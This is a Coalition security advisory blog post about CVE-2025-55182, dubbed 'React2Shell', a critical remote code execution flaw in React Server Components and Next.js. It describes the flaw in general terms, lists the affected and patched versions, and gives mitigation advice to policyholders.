Patch Immediately: Critical Vulnerability Dubbed 'React2Shell'

Joe ToomeyDecember 05, 2025

Patch Immediately: Critical Vulnerability Dubbed 'React2Shell'

On December 4, Coalition notified impacted policyholders about CVE-2025-55182, a critical deserialization vulnerability in React Server and Next.js applications that allows remote code execution (RCE) without authentication, enabling attackers to take control of the system.

This vulnerability, colloquially known as React2Shell, has received a maximum severity CVSS score of 10.0. There are now working proofs of concept (PoCs), and attacks reported in the wild. This is highly dangerous because RCE on an application server is a straight path to data theft, ransomware staging, and business interruption.

Depending on how a business hosts its application, web application firewall (WAF) rules may block exploitation attempts, but this may require direct action to enable them. Coalition urges policyholders without a WAF to patch immediately to prevent a likely breach. Policyholders with WAF protections should still update applications as soon as possible.

What happened?

On November 29, a researcher reported CVE-2025-55182, an RCE vulnerability in React and Next.js applications.

React, a widely used, open-source JavaScript library for front-end web development, is maintained by Meta and utilized by organizations globally. Next.js, maintained by Vercel, is a React-based framework. It extends React's capabilities by adding features such as server-side rendering, routing, and the creation of API endpoints.

React2Shell has received a maximum severity CVSS score of 10.0. There are now working proofs of concept (PoCs), and attacks reported in the wild.

The issue stems from React Server Components (RCS) — used by default in Next.js applications and sometimes in React applications — that contain vulnerable code that unsafely deserializes payloads from HTTP requests to Server Function endpoints.

The affected versions are:

>= 14.3.0-canary.77
>= 15.x
>= 16.x

Within hours of the vulnerability’s disclosure, cloud providers and threat intel teams reported active exploitation, including Chinese state-linked groups targeting internet-facing systems. Large cloud infrastructure providers like Cloudflare have had service disruptions while deploying the urgent mitigations.

This vulnerability shares some of the hallmarks of the 2021 vulnerability, Log4Shell (CVE-2021-44228), which led to hundreds of ransomware attacks and had lasting impacts.

How do businesses address this?

To mitigate this vulnerability, it is critical that businesses update their Next.js systems to a patched version:

15.0.5
15.1.9
15.3.6
15.4.8
15.5.7
16.0.7

The vulnerability also affects experimental canary releases starting with 14.3.0-canary.77. Users on any of the 14.3 canary builds should either downgrade to a 14.x stable release or 14.3.0-canary.76.

It is imperative that all businesses patch as quickly as possible.

For businesses that are not using Next.js but are using RSC directly, update the following components:

react-server-dom-parcel
react-server-dom-turbopack
React-server-dom-webpack

Affected versions of these components are 19.0.0, 19.1.0, 19.1.1, and 19.2.0. These components must be updated to one of the following patched versions:

19.0.1
19.1.2
19.2.1

For businesses with WAF, they must ensure that protections are enabled. For businesses that do not have a WAF and cannot update, they must take the application down until they can apply the update. It is imperative that all businesses patch as quickly as possible.

Who's at risk?

This vulnerability could be massively damaging because 1) React and Next.js are downloaded a combined total of more than 72 million times weekly, and 2) the vulnerability is simple to exploit.

Open-source code is a critical component of many organizations’ digital infrastructure. That’s why, when JavaScript libraries like these are exploited, the consequences can ripple throughout the software supply chain, leading to risk aggregation.

React2Shell shares some of the hallmarks of the 2021 vulnerability, Log4Shell (CVE-2021-44228), which led to hundreds of ransomware attacks and had lasting impacts.

Among Coalition policyholders notified about this vulnerability, businesses in the software and services (15%), professional services (11%), and hospitality (10%) industries were most impacted. The highest proportion of impacted policyholders had fewer than 50 employees (72%) and were small to midsize businesses by revenue (94%).

Coalition has observed specific IP address scanning for the vulnerability and exploiting it in the wild. At the bottom of this post, please find those specific tactics, techniques, and procedures (TTPs).

How is Coalition responding?

Coalition has notified any impacted policyholders. Coalition policyholders can log in to Coalition Control® for the latest updates. Coalition also recommends that policyholders follow the latest guidance from React.

We continue to monitor the situation closely. For assistance with mitigation, contact Coalition’s Security Support Center at securitysupport@coalitioninc.com.